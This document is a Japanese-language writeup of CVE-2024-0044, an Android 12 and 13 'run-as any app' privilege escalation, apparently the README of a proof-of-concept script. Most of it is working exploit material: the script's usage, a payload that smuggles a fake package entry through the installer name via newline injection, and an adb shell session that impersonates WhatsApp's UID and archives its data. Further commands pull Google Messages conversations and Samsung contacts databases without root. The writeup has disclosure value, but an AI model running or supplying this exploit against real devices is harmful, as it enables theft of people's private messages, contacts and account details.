
CVE-2024-0044: "run-as any app" 高深刻度の脆弱性、Android バージョン 12 および 13 に影響を与える
CVE-2024-0044は、PackageInstallerService.javaファイルのcreateSessionInternal関数で特定された、Android 12および13に影響を与える高深刻度の脆弱性です。この脆弱性により、攻撃者は「任意のアプリとして実行」攻撃を実行でき、ユーザーの操作を必要とせずにローカルの権限昇格が可能になります。この問題は、createSessionInternal関数内での不適切な入力検証に起因します。攻撃者はセッション作成プロセスを操作することでこれを悪用し、影響を受けるデバイス上の機密データへの不正アクセスや不正なアクションを実行する可能性があります。
この脆弱性は Meta security によって発見されました。
概念実証は Tiny hack によって要約され共有されました。
セキュリティパッチの詳細は Android セキュリティ情報 にあります。
python3 cve_2024_0044.py -h
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#
usage: cve_2024_0044.py [-h] -P P -A A
CVE-2024-0044: run-as any app @Pl4int3xt
options:
-h, --help show this help message and exit
-P P package name (default: None)
-A A apk file path (default: None)
-P は、実行したいターゲットパッケージ名を指定するために使用します。
-A は、デバイスにプッシュするAPKファイルを指定するために使用します。
ツールを実行します。
python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk
次のような payload.txt ファイルが生成されます。
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success メッセージが返されることを確認する必要があります。pl4int3xt ~> adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success
pixel:/ $ mkdir /data/local/tmp/wa/
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp
一時ディレクトリを作成: mkdir /data/local/tmp/wa/
tarファイルのプレースホルダを作成: touch /data/local/tmp/wa/wa.tar
広範なアクセス許可を設定: chmod -R 0777 /data/local/tmp/wa/ これにより、すべてのユーザーがこのディレクトリ内で読み取り、書き込み、実行できるようになります。
ユーザーコンテキストを切り替え: run-as victim により、「victim」ユーザーと同じ権限を取得します。
ターゲットアプリケーションのデータをアーカイブ: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp で、WhatsAppデータディレクトリのtarボールを作成します。
adb pull /data/local/tmp/wa/wa.tar
7z またはその他のツールを使用してデータを抽出できます。
Whatsapp chat exporter を使用してHTMLに変換できます。
これにより、デバイス上でrootアクセスなしでWhatsAppデータを取得できます。
パッケージ名を次のように変更するだけです。
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.google.android.apps.messaging -A ~/Down
loads/F-Droid.apk
上記の手順に従い、wa.tar ファイルをプルした後、展開し、com.google.android.apps.messaging/databases/bugle_db の会話を sqlitebrowser またはその他のツールで開きます。
Samsungデバイスでテスト済み。他のデバイスの場合は、連絡先プロバイダーのパッケージ名を確認してください。
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.samsung.android.app.contacts -A ~/Downloads/F-Droid.apk
上記の手順に従い、wa.tar ファイルをプルした後、展開し、com.samsung.android.providers.contacts/databases/contacts2.db の連絡先を sqlitebrowser またはその他のツールで開きます。このDBファイルには、連絡先リストとともにすべてのユーザーのメールアカウント情報が含まれています。